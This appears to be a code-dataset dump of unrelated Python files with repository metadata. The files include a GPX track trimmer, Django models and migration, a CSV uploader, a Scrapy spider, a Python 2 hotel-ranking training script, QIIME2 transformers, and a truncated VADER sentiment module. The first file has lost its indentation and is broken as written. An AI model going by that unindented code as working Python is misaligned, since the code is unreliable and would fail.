def date_pos_string(self):
"""Returns a string describing the datetime and position of this point."""
return '{} at {}'.format(self.time.strftime('%Y-%m-%d %H%M'), self.pos_string())
def distance_from(self, other):
"""Returns the distance of this point from other in meters."""
dlat_m = (self.lat - other.lat) * M_PER_DEGREE_LAT
dlong_m = (self.long - other.long) * M_PER_DEGREE_LAT * m.cos(m.radians(other.lat))
return m.sqrt(m.pow(dlat_m, 2) + m.pow(dlong_m, 2))
def rounded_lat_long(self):
"""Returns the (lat, long) of this point rounded to a ~1 meter resolution."""
return (round(self.lat, 5), round(self.long, 5))
class PointRange:
"""A start and end index into a list of points."""
def __init__(self, points, start, end):
self.points = points
self.start = start
self.end = end
self.rounded = {p.rounded_lat_long() for p in points[start:end+1]}
def __str__(self):
return '{}-{} near {}'.format(self.points[self.start].time.strftime('%H%M'),
self.points[self.end].time.strftime('%H%M'),
self.points[self.start].pos_string())
@property
def duration(self):
"""Returns the duration between the first and last points in this range."""
return self.points[self.end].time - self.points[self.start].time
def point_within_distance(self, point, distance):
"""Returns True if the point (rounded) is within distance of all points in this range."""
point_rounded = point.rounded_lat_long()
for range_rounded in self.rounded:
dlat_m = (range_rounded[0] - point_rounded[0]) * M_PER_DEGREE_LAT
dlong_m = ((range_rounded[1] - point_rounded[1]) * M_PER_DEGREE_LAT
* m.cos(m.radians(point_rounded[0])))
if m.sqrt(m.pow(dlat_m, 2) + m.pow(dlong_m, 2)) > distance:
return False
return True
def last_index_where_point_is_outside_distance(self, point, distance):
"""Returns the last index in this range at which the supplied point is outside distance,
or None is its within distance of the entire range."""
for compare_idx in range(self.end, self.start-1, -1):
if point.distance_from(self.points[compare_idx]) > distance:
return compare_idx
return None
def increment_end(self):
"""Increases the size of this range by one point at the end."""
self.end += 1
self.rounded.add(self.points[self.end].rounded_lat_long())
def overlaps(self, other):
"""Returns true if this range overlaps other."""
return not (self.start > other.end or self.end < other.start)
class Track:
"""The interpreted contexts of a GPX file."""
def __init__(self, filename):
self.tree = ElementTree.parse(filename)
self.points = []
xml_track = self.tree.getroot().find('trk', NS)
self.xml_segment = xml_track.find('trkseg', NS)
for xml_point in self.xml_segment.findall('trkpt', NS):
self.points.append(Point(xml_point))
def get_stationary_ranges(self, args):
"""Returns a list of PointRange objects for times in the track where we appear stationery
based on thresholds supplied in args."""
ranges = []
potential = None
current = PointRange(self.points, 0, 0)
for idx, point in enumerate(self.points):
# If the new point is inside the current range just extend the range and we're done.
if current.point_within_distance(point, args.distance):
current.increment_end()
continue
# This point is not close to the set of rounded values in the current range, find
# the latest place in the range we're in disagreement with.
outside_idx = current.last_index_where_point_is_outside_distance(point, args.distance)
if outside_idx is not None:
if current.duration > args.time:
# We're about to forget a current range that was potentially viable.
if not potential:
# If we didn't have a previous viable range use this.
potential = current
elif not current.overlaps(potential):
# If this doesn't touch the previous viable range we found, that previous
# viable range should be included in the output.
ranges.append(potential)
potential = current
elif current.duration > potential.duration:
# If this is longer than an the previous one and overlaps the previous one
# it is a better candidate to be potentially included in the results.
potential = current
# The new current range is everything we matched after the first mismatch.
current = PointRange(self.points, outside_idx+1, idx)
else:
# Is it technically possible to not be outside and point because we used rounded
# positions before for speed. If so just extend the range.
current.increment_end()
# After the loop, include any eligible range we've not yet added
if potential:
ranges.append(potential)
return ranges
def trim(self, start, end):
"""Delete all points outside the supplied indices and update times to match."""
# Update the custom Navionics time propertied if they exist.
ext = self.xml_segment.find('extensions', NS)
if ext and ext.find('navionics_start_time', NS):
ext.find('navionics_start_time', NS).text = self.points[start].xml.find('time', NS).text
if ext and ext.find('navionics_end_time', NS):
ext.find('navionics_end_time', NS).text = self.points[end].xml.find('time', NS).text
# Delete any points outside the time range.
start_time = self.points[start].time
end_time = self.points[end].time
for point in self.points:
if point.time < start_time or point.time > end_time:
self.xml_segment.remove(point.xml)
def save(self, filename):
"""Outputs the track to the supplied filename."""
ElementTree.register_namespace('', NS[''])
self.tree.write(filename, xml_declaration=True, encoding='UTF-8')
def output_filename(input_filename):
"""Returns the default output filename to use for the supplied input filename."""
base, ext = os.path.splitext(input_filename)
return base + '_trimmed' + ext
def create_parser():
"""Creates the definition of the expected command line flags."""
def file_if_valid(parser, arg):
if not os.path.exists(arg):
parser.error(f'{arg} does not exist')
return None
return arg
def seconds(arg):
return dt.timedelta(seconds=arg)
def ft_to_m(arg):
return int(arg / FT_PER_M)
parser = argparse.ArgumentParser(
description='Script to interactively trim a Navionics GPS tracks to the time of motion.'
'NOTE: This uses the Python ElementTree parser which is not secure against '
'malicious inputs. Please be sure you trust whatever generated your input '
'track files.',
epilog='Copyright Jody Sankey 2022')
parser.add_argument('input', metavar='TRACK_FILE', type=lambda x: file_if_valid(parser, x),
help='A GPX track file.')
parser.add_argument('output', metavar='OUT_FILE', nargs='?', default=None, help='The output '
'filename, if omitted filename will be derived from the input.')
# Note we ask the user to supply the distance in FT to match our UI, but internally use meters.
parser.add_argument('-d', '--distance', metavar='FT', action='store', default=50, type=ft_to_m,
help='Distance threshold to determine stationary.')
parser.add_argument('-t', '--time', metavar="SEC", action='store', type=seconds,
default=dt.timedelta(seconds=300),
help='Time (in seconds) to determine stationary.')
return parser
def main():
"""Executes the script using command line arguments."""
args = create_parser().parse_args()
print('Parsing track...')
track = Track(args.input)
ranges = track.get_stationary_ranges(args)
print('Track contains the following events:')
print(' 0: Track starts {}'.format(track.points[0].date_pos_string()))
for i, rng in enumerate(ranges):
print(' {}: Stationary {}'.format(i+1, rng))
print(' {}: Track ends {}'.format(len(ranges)+1, track.points[-1].date_pos_string()))
start_evt = int(input('Which of these events should be the new start of the file? '))
start_idx = 0 if start_evt == 0 else ranges[start_evt-1].end
end_evt = int(input('Which of these events should be the new end of the file? '))
end_idx = len(track.points)-1 if start_evt == len(ranges)+1 else ranges[end_evt-1].start
output = output_filename(args.input) if args.output is None else args.output
track.trim(start_idx, end_idx)
track.save(output)
print('Wrote modified track to {}'.format(output))
if __name__ == '__main__':
main()
| [
"jody@jsankey.com"
] | jody@jsankey.com |
3620bb985342eb123684c4a32d71bb3c4ebf82a0 | 1ef7dfdb5ed2bbe4dabad4c957e3fe7632e0a6d0 | /hospitals/models.py | cd850a4ee059d2225fcf3921bb5b2dbc12e900da | [
"MIT"
] | permissive | mn-ahmed/geodjango-hospitals-api | 4747a837f8d853c71442bf331d878a1a56104184 | 3a816a47af266fd93a9aa532132515999feaacdc | refs/heads/master | 2023-04-03T02:31:32.591678 | 2021-04-11T11:20:48 | 2021-04-11T11:20:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | from django.contrib.gis.db import models
from django.utils.translation import gettext_lazy as _
class Hospital(models.Model):
name = models.CharField(_("Hospital Name"), max_length=100)
lon = models.FloatField(_("Longitude"))
lat = models.FloatField(_("Latitude"))
fid = models.IntegerField(_("Field ID"))
beds = models.IntegerField(_("Bed Numbers"), default=1)
province_name = models.CharField(_("Province"), max_length=100)
province_code = models.CharField(_("Province Code"), max_length=1)
geom = models.PointField(srid=4326)
def __str__(self):
return self.name
| [
"alphaogilo@gmail.com"
] | alphaogilo@gmail.com |
ed5b5f0ce15b2c011afe31a4fa5d2555b2f19e89 | 30b74faf5c79e66699e549aed2dfb532c4e05f78 | /uploader/helpers.py | 992bea3842e7cf12ad647e76e708527330e1d139 | [] | no_license | carlosaguilarGL/hackerrank_uploader | a0319cf4cd49458a92bcda25efae09573f42885c | 6feda33f3a1f562bfd359799e9f41e2e7b48f223 | refs/heads/master | 2023-03-05T20:24:45.107171 | 2021-02-12T20:47:32 | 2021-02-12T20:47:32 | 337,779,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,465 | py | from .models import Question, Option
import csv
from django.db import transaction
@transaction.atomic
def create_questions(content):
"""
Create Questions and Options from a CSV content stream.
This method is not optimized for large amount of questions since it
creates the questions 1 by 1
"""
questions = []
letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']
skip_status = ['done', 'skip']
for row in csv.DictReader(content):
if row['Status'].lower() in skip_status:
continue
answers = row['Answers']
hr_id = None
try:
question = Question.objects.get(name=row['Name'])
hr_id = question.hr_id
question.delete()
except Question.DoesNotExist:
pass
finally:
question = Question.objects.create(
name=row['Name'],
tags=row['Tags'],
recommended_time=row['Recommended_time'],
description=row['Description'],
score=row['Score'],
hr_id=hr_id
)
question.option_set.set([
Option.objects.create(
letter=letter,
text=row[letter],
is_answer=letter in answers,
question=question
)
for letter in letters if letter in row and row[letter]
])
questions.append(question)
return questions | [
"carlos.aguilar@gorillalogic.com"
] | carlos.aguilar@gorillalogic.com |
66457420921a99d9003f951d8dd379354cc20c03 | 4e27996c2045ac0f7e3241e5cb4194731b0726f1 | /Tech Blog Scraping/website7/website7/website7/spiders/tech7.py | d7e5e60ab74118c5b15f8f2b6f3b45f6fcd1befd | [] | no_license | VaibhavDN/Websec | 1264a573062a2eb63d06f90044ab49122ee02bc6 | a9e30e68145af3d64dd38e50d50a2de34c61400a | refs/heads/master | 2021-07-09T18:35:33.053070 | 2020-09-21T17:21:30 | 2020-09-21T17:21:30 | 203,001,579 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # -*- coding: utf-8 -*-
import scrapy
import request
import response
from ..items import Website7Item
class Tech5Spider(scrapy.Spider):
name = 'tech7'
start_urls = ['https://www.nytimes.com/section/technology']
def parse(self, response):
items=Website7Item()
text=response.css('.e1xfvim30 , .e1xdw5350 a , .e1xdw5352 a').css('::text').extract()
items['text']=text
yield items | [
"princebest3@rediffmail.com"
] | princebest3@rediffmail.com |
b9bc24ae50a0a73ab58acdb4bcb32c164927eb81 | 84ca82df3cbabad2aa5f007ccfff0f259f6768e5 | /tileservermapping/mapping/migrations/0006_auto_20181226_1555.py | 29aa1b41a04ce6f1151f8a712bfb8fe1b23ba663 | [
"MIT"
] | permissive | Map-Data/tileserver-mapping | c98bf1a17ac254b45f21992a6582d19f7d0d54c2 | 85292f28a65b174c07193e6f54ae488c667e96dd | refs/heads/master | 2022-12-12T15:13:43.870424 | 2020-05-29T11:21:33 | 2020-05-29T11:21:33 | 238,496,733 | 0 | 0 | MIT | 2021-09-22T18:35:36 | 2020-02-05T16:30:48 | Python | UTF-8 | Python | false | false | 740 | py | # Generated by Django 2.0.6 on 2018-12-26 15:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mapping', '0005_auto_20181226_1522'),
]
operations = [
migrations.AlterField(
model_name='server',
name='url_postfix',
field=models.CharField(blank=True, default='', max_length=200),
),
migrations.AddIndex(
model_name='server',
index=models.Index(fields=['z', 'x', 'y'], name='mapping_ser_z_5c1e4a_idx'),
),
migrations.AddIndex(
model_name='server',
index=models.Index(fields=['active'], name='mapping_ser_active_87086c_idx'),
),
]
| [
"dev@finn-thorben.me"
] | dev@finn-thorben.me |
f01735b659f15565c53914ee8c4bc8dbab4ea233 | 02a40301ff95e2e41adce83c417247c8afb9c75c | /ICDM2013-Expedia-Recommendation-System-master/ICDM2013-Expedia-Recommendation-System-master/pythoncode/train2.py | 6c16c6099adaf0e37211207904efdd6cdb8933fd | [] | no_license | kasrad/MThesis | 33164e19cf828be80543f3a4ca702fa0ded19d2c | f25239e6fb800d7c2f344e589d3fbfc671b8f77f | refs/heads/master | 2021-01-25T09:45:10.326785 | 2018-04-13T11:33:21 | 2018-04-13T11:33:21 | 123,317,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,110 | py | import sys
import data_io
import model
import pandas as pd
import random
from sklearn.ensemble import RandomForestClassifier
from datetime import datetime
def get_features(train, isBook=True):
feature_names = list(train.columns)[:27]
if "comp1_rate" in feature_names:
## only true in the test set
feature_names.remove("comp1_rate")
if "position" in feature_names:
## only true in the training set
feature_names.remove("position")
feature_names.remove("date_time")
feature_names.remove("srch_id")
feature_names.remove("visitor_hist_starrating")
if isBook:
feature_names.append("visitor_hist_starrating_bool")
feature_names.append("comp_rate_sum")
feature_names.append("comp_inv_sum")
return feature_names
def feature_eng(train):
## deal with NAs in hotels's infor
train['prop_review_score'].fillna(3, inplace=True)
train['prop_review_score'][train['prop_review_score']==0]=2.5
train["prop_location_score2"].fillna(0, inplace=True)
avg_srch_score = train["srch_query_affinity_score"].mean()
train["srch_query_affinity_score"].fillna(avg_srch_score, inplace=True)
train["orig_destination_distance"].fillna(1509,inplace=True)
train["visitor_hist_adr_usd"].fillna(0, inplace=True)
train['visitor_hist_starrating_bool'] = pd.notnull(train['visitor_hist_starrating'])
## add feature: comp_rate_sum
for i in range(1,9):
train['comp'+str(i)+'_rate'].fillna(0, inplace=True)
train['comp_rate_sum'] = train['comp1_rate']
for i in range(2,9):
train['comp_rate_sum'] += train['comp'+str(i)+'_rate']
## add feature: comp_rate_sum
for i in range(1,9):
train['comp'+str(i)+'_inv'].fillna(0, inplace=True)
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==1] = 10
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==-1] = 1
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==0] = -1
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==10] = 0
train['comp_inv_sum'] = train['comp1_inv']
for i in range(2,9):
train['comp_inv_sum'] += train['comp'+str(i)+'_inv']
def main():
sample_size = int(sys.argv[1])
## sample_size = int(1000)
train = data_io.read_train()
print("Data Size:")
print(train.shape)
feature_eng(train)
## originally sample size = 100000
train_set = train[:sample_size]
book_trainset = train_set[train_set['booking_bool']==1]
book_rows = book_trainset.index.tolist()
bsize = len(book_trainset.index)
click_trainset = train_set[train_set['click_bool']==1]
click_rows = click_trainset.index.tolist()
csize = len(click_trainset.index)
print 'bsize ' + str(bsize)
print 'csize ' + str(csize)
book_trainset = book_trainset.append(train_set.ix[random.sample(train_set.drop(book_rows).index, bsize)])
click_trainset =click_trainset.append(train_set.ix[random.sample(train_set.drop(click_rows).index, csize)])
## Train the booking model
for i in range(0,2):
if i==0:
model_name = "Booking"
response_name = "booking_bool"
train_sample = book_trainset
isBook = True
else:
model_name = "Click"
response_name = "click_bool"
train_sample = click_trainset
isBook = False
print("Training the "+model_name+" Classifier...")
tstart = datetime.now()
feature_names = get_features(train_sample, isBook)
print("Using "+str(len(feature_names))+" features...")
features = train_sample[feature_names].values
target = train_sample[response_name].values
classifier = model.model()
classifier.fit(features, target)
# print the time interval
print("Time used,")
print datetime.now() - tstart
print("Saving the classifier...")
tstart = datetime.now()
data_io.save_model(classifier, isBook)
print("Time used,")
print datetime.now() - tstart
if __name__=="__main__":
main()
| [
"radim248@gmail.com"
] | radim248@gmail.com |
8d3c1b8bce69b57d0d51802846a66c1e439b70e4 | ca4faa1c6d4d87d1702b2c42a64ea6a063d71de9 | /q2_micom/_transform.py | bc96be1fc23acd5496509e2495ad09d70dc7cd8b | [
"Apache-2.0"
] | permissive | Gibbons-Lab/q2-micom | cb0ed1185a50248eae94a415e03443dbacfa8bfb | 2d954d4f584675c29aa2eccb5245e4469f1740b6 | refs/heads/master | 2020-12-07T08:48:10.020690 | 2020-01-07T23:27:39 | 2020-01-07T23:27:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,558 | py | """Transformers for MICOM types."""
import pandas as pd
from q2_micom.plugin_setup import plugin
import q2_micom._formats_and_types as ft
@plugin.register_transformer
def _1(data: pd.DataFrame) -> ft.MicomMediumFile:
mm = ft.MicomMediumFile()
data.to_csv(str(mm), index=False)
return mm
@plugin.register_transformer
def _2(mm: ft.MicomMediumFile) -> pd.DataFrame:
return pd.read_csv(str(mm), index_col=False)
@plugin.register_transformer
def _3(data: pd.DataFrame) -> ft.ModelManifest:
sbm = ft.SBMLManifest()
data.to_csv(str(sbm), index=False)
return sbm
@plugin.register_transformer
def _4(sbm: ft.ModelManifest) -> pd.DataFrame:
return pd.read_csv(str(sbm), index_col=False)
@plugin.register_transformer
def _5(data: pd.DataFrame) -> ft.CommunityModelManifest:
cmm = ft.CommunityModelManifest()
data.to_csv(str(cmm), index=False)
return cmm
@plugin.register_transformer
def _6(cmm: ft.CommunityModelManifest) -> pd.DataFrame:
return pd.read_csv(str(cmm), index_col=False)
@plugin.register_transformer
def _7(data: pd.DataFrame) -> ft.GrowthRates:
gr = ft.GrowthRates()
data.to_csv(str(gr), index=False)
return gr
@plugin.register_transformer
def _8(gr: ft.GrowthRates) -> pd.DataFrame:
return pd.read_csv(str(gr), index_col=False)
@plugin.register_transformer
def _9(data: pd.DataFrame) -> ft.Fluxes:
ef = ft.Fluxes()
data.to_parquet(str(ef))
return ef
@plugin.register_transformer
def _10(ef: ft.Fluxes) -> pd.DataFrame:
return pd.read_parquet(str(ef))
| [
"ch.diener@gmail.com"
] | ch.diener@gmail.com |
2b1845f43f88f2094ba18076d42a03c3206e6743 | e75f2c2bc9ce85c9be1e0c4f6cdc3285589476de | /vader.py | 47e4ee3163e3298307140c9d067bf65f7f936e10 | [] | no_license | JeongWonJo/emojiRecommendation | 7ba68d13e3ae9a4c902ed3dccca486433e7da9ce | 9597e26686601750acf368b75bec0e0805162e27 | refs/heads/master | 2020-03-27T19:17:53.453708 | 2018-12-08T01:50:23 | 2018-12-08T01:50:23 | 146,979,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,865 | py | """
If you use the VADER sentiment analysis tools, please cite:
Hutto, C.J. & Gilbert, E.E. (2014). VADER: A Parsimonious Rule-based Model for
Sentiment Analysis of Social Media Text. Eighth International Conference on
Weblogs and Social Media (ICWSM-14). Ann Arbor, MI, June 2014.
"""
# Python 2/3 compatibility: under Python 2, alias input() to raw_input() so
# input() always returns a str instead of eval()-ing the typed text. Under
# Python 3, raw_input no longer exists and the builtin input() already has
# the desired behavior, so the NameError is simply ignored.
try:
    input = raw_input  # noqa: F821 (Python 2 only)
except NameError:
    pass
import nltk
import math, re, string, requests, json
from itertools import product
from inspect import getsourcefile
from os.path import abspath, join, dirname
##Constants##

# (empirically derived mean sentiment intensity rating increase for booster words)
B_INCR = 0.293
B_DECR = -0.293

# (empirically derived mean sentiment intensity rating increase for using
# ALLCAPs to emphasize a word)
C_INCR = 0.733

# Scalar multiplier applied to a valence when it is negated
# (flips the sign and dampens the magnitude).
N_SCALAR = -0.74

# for removing punctuation
REGEX_REMOVE_PUNCTUATION = re.compile('[%s]' % re.escape(string.punctuation))

# Punctuation tokens (single marks and common emphatic runs) used when
# matching words that carry adjacent punctuation.
PUNC_LIST = [".", "!", "?", ",", ";", ":", "-", "'", "\"",
             "!!", "!!!", "??", "???", "?!?", "!?!", "?!?!", "!?!?"]

# Words and common contracted forms that signal negation of nearby sentiment.
NEGATE = \
    ["aint", "arent", "cannot", "cant", "couldnt", "darent", "didnt", "doesnt",
     "ain't", "aren't", "can't", "couldn't", "daren't", "didn't", "doesn't",
     "dont", "hadnt", "hasnt", "havent", "isnt", "mightnt", "mustnt", "neither",
     "don't", "hadn't", "hasn't", "haven't", "isn't", "mightn't", "mustn't",
     "neednt", "needn't", "never", "none", "nope", "nor", "not", "nothing", "nowhere",
     "oughtnt", "shant", "shouldnt", "uhuh", "wasnt", "werent",
     "oughtn't", "shan't", "shouldn't", "uh-uh", "wasn't", "weren't",
     "without", "wont", "wouldnt", "won't", "wouldn't", "rarely", "seldom", "despite"]

# booster/dampener 'intensifiers' or 'degree adverbs'
# http://en.wiktionary.org/wiki/Category:English_degree_adverbs
# Maps each intensifier to the amount it raises (B_INCR) or lowers (B_DECR)
# the valence of the word it modifies.
BOOSTER_DICT = \
    {"absolutely": B_INCR, "amazingly": B_INCR, "awfully": B_INCR, "completely": B_INCR, "considerably": B_INCR,
     "decidedly": B_INCR, "deeply": B_INCR, "effing": B_INCR, "enormously": B_INCR,
     "entirely": B_INCR, "especially": B_INCR, "exceptionally": B_INCR, "extremely": B_INCR,
     "fabulously": B_INCR, "flipping": B_INCR, "flippin": B_INCR,
     "fricking": B_INCR, "frickin": B_INCR, "frigging": B_INCR, "friggin": B_INCR, "fully": B_INCR, "fucking": B_INCR,
     "greatly": B_INCR, "hella": B_INCR, "highly": B_INCR, "hugely": B_INCR, "incredibly": B_INCR,
     "intensely": B_INCR, "majorly": B_INCR, "more": B_INCR, "most": B_INCR, "particularly": B_INCR,
     "purely": B_INCR, "quite": B_INCR, "really": B_INCR, "remarkably": B_INCR,
     "so": B_INCR, "substantially": B_INCR,
     "thoroughly": B_INCR, "totally": B_INCR, "tremendously": B_INCR,
     "uber": B_INCR, "unbelievably": B_INCR, "unusually": B_INCR, "utterly": B_INCR,
     "very": B_INCR,
     "almost": B_DECR, "barely": B_DECR, "hardly": B_DECR, "just enough": B_DECR,
     "kind of": B_DECR, "kinda": B_DECR, "kindof": B_DECR, "kind-of": B_DECR,
     "less": B_DECR, "little": B_DECR, "marginally": B_DECR, "occasionally": B_DECR, "partly": B_DECR,
     "scarcely": B_DECR, "slightly": B_DECR, "somewhat": B_DECR,
     "sort of": B_DECR, "sorta": B_DECR, "sortof": B_DECR, "sort-of": B_DECR}

# check for special case idioms using a sentiment-laden keyword known to VADER
# Multi-word idioms whose sentiment differs from that of their component words.
SPECIAL_CASE_IDIOMS = {"the shit": 3, "the bomb": 3, "bad ass": 1.5, "yeah right": -2,
                       "cut the mustard": 2, "kiss of death": -1.5, "hand to mouth": -2}
##Static methods##
def negated(input_words, include_nt=True):
    """
    Determine if input contains negation words
    """
    # Any token from the module-level NEGATE list counts as a negation.
    for negation in NEGATE:
        if negation in input_words:
            return True
    if include_nt:
        # Also catch apostrophized contractions such as "can't" / "won't".
        if any("n't" in token for token in input_words):
            return True
    # "least" negates unless it follows "at" ("at least" is comparative).
    if "least" in input_words:
        idx = input_words.index("least")
        if idx > 0 and input_words[idx - 1] != "at":
            return True
    return False
def normalize(score, alpha=15):
    """
    Normalize the score to be between -1 and 1 using an alpha that
    approximates the max expected value
    """
    # VADER normalization: x / sqrt(x^2 + alpha) maps R onto (-1, 1).
    scaled = score / math.sqrt(score * score + alpha)
    # Clamp defensively; the formula itself never leaves (-1, 1).
    return max(-1.0, min(1.0, scaled))
def allcap_differential(words):
    """
    Check whether just some words in the input are ALL CAPS

    :param list words: The words to inspect
    :returns: `True` if some but not all items in `words` are ALL CAPS
    """
    upper_count = sum(1 for w in words if w.isupper())
    non_upper_count = len(words) - upper_count
    # True only when the input mixes ALL-CAPS and non-ALL-CAPS tokens.
    return 0 < non_upper_count < len(words)
def scalar_inc_dec(word, valence, is_cap_diff):
    """
    Check if the preceding words increase, decrease, or negate/nullify the
    valence
    """
    lowered = word.lower()
    if lowered not in BOOSTER_DICT:
        # Non-booster words contribute nothing.
        return 0.0
    modifier = BOOSTER_DICT[lowered]
    # Boosters push the score further in the direction of the valence.
    if valence < 0:
        modifier = -modifier
    # An ALL-CAPS booster amid mixed-case text carries extra emphasis.
    if word.isupper() and is_cap_diff:
        modifier = modifier + C_INCR if valence > 0 else modifier - C_INCR
    return modifier
class SentiText(object):
    """
    Identify sentiment-relevant string-level properties of input text.
    """
    def __init__(self, text):
        # NOTE(review): for non-str input this stores the repr of the
        # encoded bytes (e.g. "b'...'"), not decoded text -- confirm intended.
        if not isinstance(text, str):
            text = str(text.encode('utf-8'))
        self.text = text
        # Tokens with adjacent punctuation stripped (see helpers below).
        self.words_and_emoticons = self._words_and_emoticons()
        # doesn't separate words from\
        # adjacent punctuation (keeps emoticons & contractions)
        # True when SOME but not all tokens are ALL CAPS (emphasis signal).
        self.is_cap_diff = allcap_differential(self.words_and_emoticons)
    def _words_plus_punc(self):
        """
        Returns mapping of form:
        {
            'cat,': 'cat',
            ',cat': 'cat',
        }
        i.e. every multi-char word in the text combined with every
        punctuation mark (before and after), mapped back to the bare word.
        """
        no_punc_text = REGEX_REMOVE_PUNCTUATION.sub('', self.text)
        # removes punctuation (but loses emoticons & contractions)
        words_only = no_punc_text.split()
        # remove singletons
        words_only = set( w for w in words_only if len(w) > 1 )
        # the product gives ('cat', ',') and (',', 'cat')
        punc_before = {''.join(p): p[1] for p in product(PUNC_LIST, words_only)}
        punc_after = {''.join(p): p[0] for p in product(words_only, PUNC_LIST)}
        words_punc_dict = punc_before
        words_punc_dict.update(punc_after)
        return words_punc_dict
    def _words_and_emoticons(self):
        """
        Removes leading and trailing puncutation
        Leaves contractions and most emoticons
        Does not preserve punc-plus-letter emoticons (e.g. :D)
        """
        wes = self.text.split()
        words_punc_dict = self._words_plus_punc()
        # Single-character tokens (including bare punctuation) are dropped.
        wes = [we for we in wes if len(we) > 1]
        for i, we in enumerate(wes):
            if we in words_punc_dict:
                # Replace "word+punct" / "punct+word" with the bare word.
                wes[i] = words_punc_dict[we]
        return wes
class SentimentIntensityAnalyzer(object):
    """
    Give a sentiment intensity score to sentences.
    """
    def __init__(self, lexicon_file="vader_lexicon.txt"):
        # Resolve the lexicon file relative to this module's location.
        _this_module_file_path_ = abspath(getsourcefile(lambda:0))
        lexicon_full_filepath = join(dirname(_this_module_file_path_), lexicon_file)
        # NOTE(review): despite its name, this attribute holds the file's
        # *contents*, not a path.
        with open(lexicon_full_filepath) as f:
            self.lexicon_full_filepath = f.read()
        self.lexicon = self.make_lex_dict()
    def make_lex_dict(self):
        """
        Convert lexicon file to a dictionary
        """
        # Each lexicon line is "token<TAB>mean-valence[<TAB>extra fields]".
        # NOTE(review): a blank (e.g. trailing) line would raise ValueError
        # here -- assumes the lexicon file contains no empty lines.
        lex_dict = {}
        for line in self.lexicon_full_filepath.split('\n'):
            (word, measure) = line.strip().split('\t')[0:2]
            lex_dict[word] = float(measure)
        return lex_dict
    def polarity_scores(self, text):
        """
        Return a float for sentiment strength based on the input text.
        Positive values are positive valence, negative value are negative
        valence.

        Returns a dict with 'neg'/'neu'/'pos' ratios and a normalized
        'compound' score in [-1, 1].
        """
        sentitext = SentiText(text)
        #text, words_and_emoticons, is_cap_diff = self.preprocess(text)
        sentiments = []
        words_and_emoticons = sentitext.words_and_emoticons
        for item in words_and_emoticons:
            valence = 0
            # NOTE(review): .index() returns the FIRST occurrence, so a word
            # repeated in the sentence is always scored at its first position.
            i = words_and_emoticons.index(item)
            # Booster words (and the bigram "kind of") contribute through the
            # neighbouring sentiment word, so they score 0 on their own.
            if (i < len(words_and_emoticons) - 1 and item.lower() == "kind" and \
                words_and_emoticons[i+1].lower() == "of") or \
                item.lower() in BOOSTER_DICT:
                sentiments.append(valence)
                continue
            sentiments = self.sentiment_valence(valence, sentitext, item, i, sentiments)
        sentiments = self._but_check(words_and_emoticons, sentiments)
        valence_dict = self.score_valence(sentiments, text)
        return valence_dict
    def sentiment_valence(self, valence, sentitext, item, i, sentiments):
        # Score token `item` at position `i`, applying caps emphasis,
        # preceding boosters/negations and idiom overrides, then append it.
        is_cap_diff = sentitext.is_cap_diff
        words_and_emoticons = sentitext.words_and_emoticons
        item_lowercase = item.lower()
        if item_lowercase in self.lexicon:
            #get the sentiment valence
            valence = self.lexicon[item_lowercase]
            #check if sentiment laden word is in ALL CAPS (while others aren't)
            if item.isupper() and is_cap_diff:
                if valence > 0:
                    valence += C_INCR
                else:
                    valence -= C_INCR
            # Look back up to three tokens for boosters / negations / idioms.
            for start_i in range(0,3):
                if i > start_i and words_and_emoticons[i-(start_i+1)].lower() not in self.lexicon:
                    # dampen the scalar modifier of preceding words and emoticons
                    # (excluding the ones that immediately preceed the item) based
                    # on their distance from the current item.
                    s = scalar_inc_dec(words_and_emoticons[i-(start_i+1)], valence, is_cap_diff)
                    if start_i == 1 and s != 0:
                        s = s*0.95
                    if start_i == 2 and s != 0:
                        s = s*0.9
                    valence = valence+s
                    valence = self._never_check(valence, words_and_emoticons, start_i, i)
                    if start_i == 2:
                        valence = self._idioms_check(valence, words_and_emoticons, i)
                        # future work: consider other sentiment-laden idioms
                        # other_idioms =
                        # {"back handed": -2, "blow smoke": -2, "blowing smoke": -2,
                        #  "upper hand": 1, "break a leg": 2,
                        #  "cooking with gas": 2, "in the black": 2, "in the red": -2,
                        #  "on the ball": 2,"under the weather": -2}
            valence = self._least_check(valence, words_and_emoticons, i)
        sentiments.append(valence)
        return sentiments
    def _least_check(self, valence, words_and_emoticons, i):
        # check for negation case using "least"
        # ("least X" negates X, except in "at least" / "very least").
        if i > 1 and words_and_emoticons[i-1].lower() not in self.lexicon \
           and words_and_emoticons[i-1].lower() == "least":
            if words_and_emoticons[i-2].lower() != "at" and words_and_emoticons[i-2].lower() != "very":
                valence = valence*N_SCALAR
        elif i > 0 and words_and_emoticons[i-1].lower() not in self.lexicon \
             and words_and_emoticons[i-1].lower() == "least":
            valence = valence*N_SCALAR
        return valence
    def _but_check(self, words_and_emoticons, sentiments):
        # check for modification in sentiment due to contrastive conjunction 'but'
        # Scores before 'but' are de-emphasized (x0.5); scores after are
        # amplified (x1.5).
        if 'but' in words_and_emoticons or 'BUT' in words_and_emoticons:
            try:
                bi = words_and_emoticons.index('but')
            except ValueError:
                bi = words_and_emoticons.index('BUT')
            # NOTE(review): sentiments.index(sentiment) finds the FIRST equal
            # score, so duplicate scores may be rescaled at the wrong slot.
            for sentiment in sentiments:
                si = sentiments.index(sentiment)
                if si < bi:
                    sentiments.pop(si)
                    sentiments.insert(si, sentiment*0.5)
                elif si > bi:
                    sentiments.pop(si)
                    sentiments.insert(si, sentiment*1.5)
        return sentiments
    def _idioms_check(self, valence, words_and_emoticons, i):
        # Build word windows around position i and compare against the
        # fixed-valence idiom table; a hit replaces the lexicon valence.
        onezero = "{0} {1}".format(words_and_emoticons[i-1], words_and_emoticons[i])
        twoonezero = "{0} {1} {2}".format(words_and_emoticons[i-2],
                                          words_and_emoticons[i-1], words_and_emoticons[i])
        twoone = "{0} {1}".format(words_and_emoticons[i-2], words_and_emoticons[i-1])
        threetwoone = "{0} {1} {2}".format(words_and_emoticons[i-3],
